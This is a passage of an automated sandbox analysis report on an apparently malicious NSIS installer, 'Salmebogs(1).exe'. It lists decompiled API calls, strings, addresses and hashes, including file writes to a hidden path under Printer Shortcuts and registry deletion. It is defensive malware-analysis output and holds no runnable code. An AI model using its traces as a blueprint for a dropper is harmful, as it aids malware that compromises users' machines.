                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 084c01015129f35d060607ba67430d3c2eb20d58b6f60067759f21b3cf07d9ee
                                                                        • Instruction ID: f1444d1149d995cfbeec1118d5879e63c7af2d267088fbf4af288243ceffc5ab
                                                                        • Opcode Fuzzy Hash: 084c01015129f35d060607ba67430d3c2eb20d58b6f60067759f21b3cf07d9ee
                                                                        • Instruction Fuzzy Hash: 70417C71800209AFCF058F95DE459AFBBB9FF45314F04842EF991AA1A0CB78DA54DFA4
                                                                        APIs
                                                                        • lstrcpyW.KERNEL32(007A55C0,NUL,?,00000000,?,?,00405EEF,?,?), ref: 00405D6B
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EEF,?,?), ref: 00405D8F
                                                                        • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405D98
                                                                          • Part of subcall function 00405B67: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B77
                                                                          • Part of subcall function 00405B67: lstrlenA.KERNEL32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA9
                                                                        • GetShortPathNameW.KERNEL32(007A5DC0,007A5DC0,00000400), ref: 00405DB5
                                                                        • wsprintfA.USER32 ref: 00405DD3
                                                                        • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405E0E
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E1D
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E55
                                                                        • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405EAB
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00405EBC
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EC3
                                                                          • Part of subcall function 00405C02: GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C06
                                                                          • Part of subcall function 00405C02: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Salmebogs(1).exe",00403513,?), ref: 00405C28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                        • String ID: %ls=%ls$NUL$[Rename]
                                                                        • API String ID: 222337774-899692902
                                                                        • Opcode ID: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                                                                        • Instruction ID: 4bbe9f86b8adcb3ee4fdb7780e986b6535a4f1249b773ec96b367cc427070a1a
                                                                        • Opcode Fuzzy Hash: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                                                                        • Instruction Fuzzy Hash: 8A312770600F147BD2202B718D49F6B3E6CEF41759F14003ABA81F62D2DA7CEA018EAD
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406324
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 00406333
                                                                        • CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00406338
                                                                        • CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Salmebogs(1).exe",00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 0040634B
                                                                        Strings
                                                                        • "C:\Users\user\Desktop\Salmebogs(1).exe", xrefs: 004062C1
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004062C2
                                                                        • *?|<>/":, xrefs: 00406313
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\Salmebogs(1).exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3294326113
                                                                        • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                        • Instruction ID: c327e11968ff1b61697d85eec455557f32973e7d313eb7c6419ca2acb5234ebd
                                                                        • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                        • Instruction Fuzzy Hash: 9111C85580021295DB3037549D40AB7A7B8EF55754F52803FED86732C0E77C9C9286ED
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00404175
                                                                        • GetSysColor.USER32(00000000), ref: 00404191
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0040419D
                                                                        • SetBkMode.GDI32(?,?), ref: 004041A9
                                                                        • GetSysColor.USER32(?), ref: 004041BC
                                                                        • SetBkColor.GDI32(?,?), ref: 004041CC
                                                                        • DeleteObject.GDI32(?), ref: 004041E6
                                                                        • CreateBrushIndirect.GDI32(?), ref: 004041F0
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                        • Instruction ID: ea06b333114cee9cc67994af2ac871624958d76533ae86cbe2848aaafb465e30
                                                                        • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                        • Instruction Fuzzy Hash: 7E2196B1500704AFCB219F68EE0CB4B7BF8AF41710F04893DE995E66A0D734D944CB64
                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                          • Part of subcall function 00405CE3: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,004025CA,00000000,00000000,?,00000000,00000011), ref: 00405CF9
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                        Similarity
                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                        • String ID: 9
                                                                        • API String ID: 163830602-2366072709
                                                                        • Opcode ID: 45a21482c542318f13e1eb5333aa3b1a888cf07139c1879041507e3b187ffe5f
                                                                        • Instruction ID: dafe1f73e2ee8cdb860d3706a1f39e5ecceba59a5ef1a457f192d56af1ee0b6a
                                                                        • Opcode Fuzzy Hash: 45a21482c542318f13e1eb5333aa3b1a888cf07139c1879041507e3b187ffe5f
                                                                        • Instruction Fuzzy Hash: 44510974D00219ABDF209F94CA88ABEB779FF04344F50447BE501F72D0D7B999829B69
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A71
                                                                        • GetMessagePos.USER32 ref: 00404A79
                                                                        • ScreenToClient.USER32(?,?), ref: 00404A93
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AA5
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ACB
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                        • Instruction ID: 9eff9150a992eb2fb06457ff5e0cc0326f2b5a04812ccf7126d2c147f81e0dfa
                                                                        • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                                        • Instruction Fuzzy Hash: FC015E71A4021CBADB00DBA4DD85FFEBBBCAF58715F10012BBB51B61C0D7B49A418BA4
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                        • MulDiv.KERNEL32(00086C3A,00000064,00086E3E), ref: 00402D4D
                                                                        • wsprintfW.USER32 ref: 00402D5D
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402D57
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 6ea019a5c915e27d0383299d327640edd576fd3642c792e58a0fbb2247e90e0f
                                                                        • Instruction ID: 33f6bc0f9c66ffbc6f0a9480d788631f8e7fe4f3fd8502bd98e35746da28410b
                                                                        • Opcode Fuzzy Hash: 6ea019a5c915e27d0383299d327640edd576fd3642c792e58a0fbb2247e90e0f
                                                                        • Instruction Fuzzy Hash: 7701447064020DAFEF149F61DD49BAA3B69FB04304F00803AFA05A91D0DBB99955CB58
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040569E
                                                                        • GetLastError.KERNEL32 ref: 004056B2
                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056C7
                                                                        • GetLastError.KERNEL32 ref: 004056D1
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405681
                                                                        • C:\Users\user\Desktop, xrefs: 0040565B
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                        • API String ID: 3449924974-1229045261
                                                                        • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                        • Instruction ID: dadfd0f85cedcb10ba49dc730fb6619fbbf26863a665bac08794baa5a138d59b
                                                                        • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                        • Instruction Fuzzy Hash: F9010871D00219DBDF109FA0C9447EFBBB8EB14304F10443AE548F6280D77996148FA9
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                        • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                        • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                        • CloseHandle.KERNEL32(?), ref: 00402914
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: 153c2b5082c2598bc60d8fb24d19b11048e31c8bd3494510fa3f863c5ef051a4
                                                                        • Instruction ID: ba6f49517a5b121574735636d58c2dc186d973e03c124db2f1d5768ba00f8754
                                                                        • Opcode Fuzzy Hash: 153c2b5082c2598bc60d8fb24d19b11048e31c8bd3494510fa3f863c5ef051a4
                                                                        • Instruction Fuzzy Hash: AC21CE72801128BBDF216FA5CE49D9E7E79EF09324F20023AF510762E1CB794E418F98
                                                                        APIs
                                                                          • Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(?,?,007A4728,?,00405B00,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A9A
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405A9F
                                                                          • Part of subcall function 00405A8C: CharNextW.USER32(00000000), ref: 00405AB7
                                                                        • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B42
                                                                        • GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728, 4#v,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405B52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: 4#v$(Gz$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3248276644-844125704
                                                                        • Opcode ID: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                                                                        • Instruction ID: 8ae2fce49526f5710a07790df8cd11e23799bcf3340ba248b926081ff081d995
                                                                        • Opcode Fuzzy Hash: 727da4a5fd54559f0b5fa84b8a7a338ed841983ac59879e6f1508895b9972b86
                                                                        • Instruction Fuzzy Hash: 98F0F429104D5116C622763A1C4AEAF3564CF8236471A023FF852B22D2DF3CB953CCBE
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 3f441c19f0f34b91adbe303d8aafc709c018744c962571da53865d23c2bfc605
                                                                        • Instruction ID: 0f445eedd0ead43dce11b02a34d11ee125e6b361330db3d8f0abcaa344057bef
                                                                        • Opcode Fuzzy Hash: 3f441c19f0f34b91adbe303d8aafc709c018744c962571da53865d23c2bfc605
                                                                        • Instruction Fuzzy Hash: 4B116771904118BFEF10AF90DF8CEAE3B79FB54384F10403AF906E10A0D7B48E55AA29
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                        • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                        • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 02abd658966be5e8f0b29f0b4f9cdccbb8b12b4f0ad4caf819e6498e3cbf6354
                                                                        • Instruction ID: 414e13ebf6cb56e84a4404cc700fc4dd46923a21780f0405722d8e14d33058f0
                                                                        • Opcode Fuzzy Hash: 02abd658966be5e8f0b29f0b4f9cdccbb8b12b4f0ad4caf819e6498e3cbf6354
                                                                        • Instruction Fuzzy Hash: 6CF0E172500504AFD701DBE4DE88CEFBBBDEB48311B104466F541F51A1CA749D018B28
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401D59
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                        • CreateFontIndirectW.GDI32(0040CDB0), ref: 00401DD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: dad2da35e6ec8a07650ae4ce35907006cce9f0779c78c460b01871806a789acb
                                                                        • Instruction ID: 8a1e816e8e54b7f29a7d0f5fc6d6dcc0f6bae9f095316fa63564fc8432a1e7a2
                                                                        • Opcode Fuzzy Hash: dad2da35e6ec8a07650ae4ce35907006cce9f0779c78c460b01871806a789acb
                                                                        • Instruction Fuzzy Hash: 5801AD72554641EFEB016BB0AF8ABAA3F74BB65301F104579F681B62E2CA7C10058B2D
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049E9
                                                                        • wsprintfW.USER32 ref: 004049F2
                                                                        • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404A05
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: db785ee730d0a4d628520b2c6d5dc9ea4aae3190b25b70f1a9c81c2a6377a7ed
                                                                        • Instruction ID: 2b7e710ae6fbde1b358b0fd1b9910d87067a2729d46772617da3059f694cf418
                                                                        • Opcode Fuzzy Hash: db785ee730d0a4d628520b2c6d5dc9ea4aae3190b25b70f1a9c81c2a6377a7ed
                                                                        • Instruction Fuzzy Hash: 7E11D8B36041282BDB10A67D9C45E9F3288DB85374F150237FE26F31D6D978D81182E8
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: c52d995c6a09de31d07699e48f6cc19fb67cda0d220f09855fcf85d18e9887f1
                                                                        • Instruction ID: 645ef1fb58c2a3823f89181aa82dd13db394815f37a7e78e367622b5584871de
                                                                        • Opcode Fuzzy Hash: c52d995c6a09de31d07699e48f6cc19fb67cda0d220f09855fcf85d18e9887f1
                                                                        • Instruction Fuzzy Hash: 17219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B88A409B69
                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,00000400,?,?,00000021), ref: 00402583
                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel,00000400,?,?,00000021), ref: 0040258E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\sknserklringerne\antilapse.fel
                                                                        • API String ID: 3109718747-4235617240
                                                                        • Opcode ID: 7a58e4eb2d75c457ba7f0bbd438a6afcb1cb9f62575a5d40834c74af925970c3
                                                                        • Instruction ID: f33233f6b55fe66688b611574b9ef10b0b9a875e6cfed5cf08d690a2f45472d2
                                                                        • Opcode Fuzzy Hash: 7a58e4eb2d75c457ba7f0bbd438a6afcb1cb9f62575a5d40834c74af925970c3
                                                                        • Instruction Fuzzy Hash: 9211E772A01314BEDB10AFB18F4AA9E3265AF94795F20803BF401F61C1DAFC8A41466E
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,: Completed,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F24
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F45
                                                                        • RegCloseKey.ADVAPI32(?,?,0040616D,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2311885120.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2311867601.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312214872.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007AD000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312238006.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2312673157.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Salmebogs(1).jbxd
                                                                        Similarity
